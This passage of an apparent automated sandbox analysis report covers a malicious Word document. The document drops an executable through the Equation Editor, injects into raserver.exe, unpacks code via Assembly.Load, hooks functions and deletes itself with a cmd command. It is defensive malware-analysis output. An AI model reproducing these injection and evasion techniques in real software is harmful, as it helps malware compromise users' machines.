          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008FF8C4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0091F8EE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0088C85C
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A286D
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0092098E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008829B2
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008969FE
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00905955
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090394B
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00933A83
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0092CBA4
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090DBDA
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087FBD7
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00906BCB
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008A7B00
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00922C9C
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0090AC5E
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0091FDDD
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_010494B4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02231238
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218E2E9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02192305
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02197353
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021DA37B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021B63DB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218F3CF
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021BD005
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021A905A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02193040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218E0C6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02232622
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02194680
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0219E6C1
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0219C7BC
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0221579A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021C57C3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021CD47D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021A1489
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021C5485
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0219351F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021AC5F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02243A83
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021B7B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0223CBA4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218FBD7
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0221DBDA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0219C85C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021B286D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0222F8EE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02215955
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021929B2
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0223098E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021A69FE
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021C2E2F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021AEE4C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021A0F3F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021BDF7C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021C0D3B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0219CD5B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0222FDDD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009E066
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D596
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009E840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009EC35
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082D90
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00089E50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00089E54
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009DE95
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00082FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2A036
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F28912
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F21082
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F25B32
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F25B30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2B232
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2E5CD
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F22D02
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0218E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 021D3F92 appears 108 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 021D373B appears 238 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 021FF970 appears 81 times
          Source: C:\Windows\SysWOW64\raserver.exeCode function: String function: 0218DF5C appears 112 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: String function: 0087DF5C appears 110 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: String function: 008EF970 appears 78 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: String function: 008C373B appears 217 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: String function: 008C3F92 appears 110 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: String function: 0087E2A8 appears 58 times
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A44A NtReadFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A47A NtClose,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041A52A NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008700C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00870048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00870078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008710D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00870060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008701D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0087010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00871148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_008707AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00871930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FB50 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FC30 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00870C40 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0086FC48 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00871D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021800C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021807AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02180048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02180078 NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02180060 NtQuerySection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021810D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02181148 NtOpenThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_021801D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02181930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02180C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0217FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_02181D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A350 NtCreateFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A400 NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A480 NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A44A NtReadFile,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A47A NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009A52A NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F29BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2A042 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F29BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE indicator has summary info: false
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\villar8681.exeMemory allocated: 76E90000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76F90000 page execute and read and write
          Source: C:\Windows\SysWOW64\raserver.exeMemory allocated: 76E90000 page execute and read and write
          Source: villar8681.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: villarzx[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: Purchase order.docVirustotal: Detection: 40%
          Source: Purchase order.docReversingLabs: Detection: 34%
          Source: C:\Users\user\AppData\Roaming\villar8681.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Users\user\AppData\Roaming\villar8681.exeProcess created: C:\Users\user\AppData\Roaming\villar8681.exe C:\Users\user\AppData\Roaming\villar8681.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\villar8681.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B196B286-BAB4-101A-B69C-00AA00341D07}\InprocServer32
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$rchase order.docJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE2A0.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@9/10@4/3
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
          Source: villar8681.exe, 00000004.00000000.413584618.0000000001042000.00000020.00020000.sdmp, villar8681.exe, 00000005.00000000.423645036.0000000001042000.00000020.00020000.sdmp, villarzx[1].exe.2.drBinary or memory string: insert into mediaitem (name, type, checked_to_patron_id, checkout_date, due_date) values (@name, @type, @patron_id, @co_date, @due_date);
          Source: villar8681.exe, 00000004.00000000.413584618.0000000001042000.00000020.00020000.sdmp, villar8681.exe, 00000005.00000000.423645036.0000000001042000.00000020.00020000.sdmp, villarzx[1].exe.2.drBinary or memory string: select id, name, type, checked_to_patron_id, checkout_date, due_date from mediaitem {0} order by name;where checked_to_patron_id = Mwhere checked_to_patron_id is not nullaselect id, name, type from patron where id = {0}_select id, name, type from patron order by nameWThe method or operation is not implemented.9Library.Properties.Resources
          Source: C:\Users\user\AppData\Roaming\villar8681.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: Purchase order.docJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
          Source: explorer.exe, 00000006.00000000.430288611.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
          Source: villar8681.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
          Source: villar8681.exeString found in binary or memory: es>false</DisallowStartIfOnBatteries> <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries> <AllowHardTerminate>false</AllowHardTerminate> <StartWhenAvailable>true</StartWhenAvailable> <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvail
          Source: villar8681.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
          Source: villar8681.exeString found in binary or memory: ble> <IdleSettings> <StopOnIdleEnd>true</StopOnIdleEnd> <RestartOnIdle>false</RestartOnIdle> </IdleSettings> <AllowStartOnDemand>true</AllowStartOnDemand> <Enabled>true</Enabled> <Hidden>false</Hidden> <RunOnlyIfIdle
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE document summary: title field not present or empty
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE document summary: author field not present or empty
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drOLE document summary: edited time not present or 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Users\user\AppData\Roaming\villar8681.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: RAServer.pdb^ source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: villar8681.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: villar8681.exe, 00000005.00000002.462916588.0000000000570000.00000040.00020000.sdmp
          Source: ~WRF{79E0ADDF-4BCA-42D2-95DC-650BFEE60233}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation:

          barindex
          .NET source code contains potential unpackerShow sources
          Source: villar8681.exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: villarzx[1].exe.2.dr, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.2.villar8681.exe.1040000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 4.0.villar8681.exe.1040000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.2.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.10.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.4.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.1.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.6.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.3.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.2.villar8681.exe.1040000.5.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.0.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 5.0.villar8681.exe.1040000.8.unpack, Library/Form1.cs.Net Code: TypeNameBuilder System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_00732B1B push es; retn 0000h
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 4_2_002DBFE3 push cs; iretd
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_004063D8 pushad ; iretd
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D4F2 push eax; ret
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D4FB push eax; ret
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D4A5 push eax; ret
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_0041D55C push eax; ret
          Source: C:\Users\user\AppData\Roaming\villar8681.exeCode function: 5_2_00406DC3 pushfd ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0218DFA1 push ecx; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_000863D8 pushad ; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D4A5 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D4FB push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D4F2 push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009D55C push eax; ret
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_0009DCA5 push es; iretd
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_00086DC3 pushfd ; retf
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2E9B5 push esp; retn 0000h
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2EB1E push esp; retn 0000h
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F2EB02 push esp; retn 0000h
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5498663896
          Source: initial sampleStatic PE information: section name: .text entropy: 7.5498663896
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\villarzx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\villar8681.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
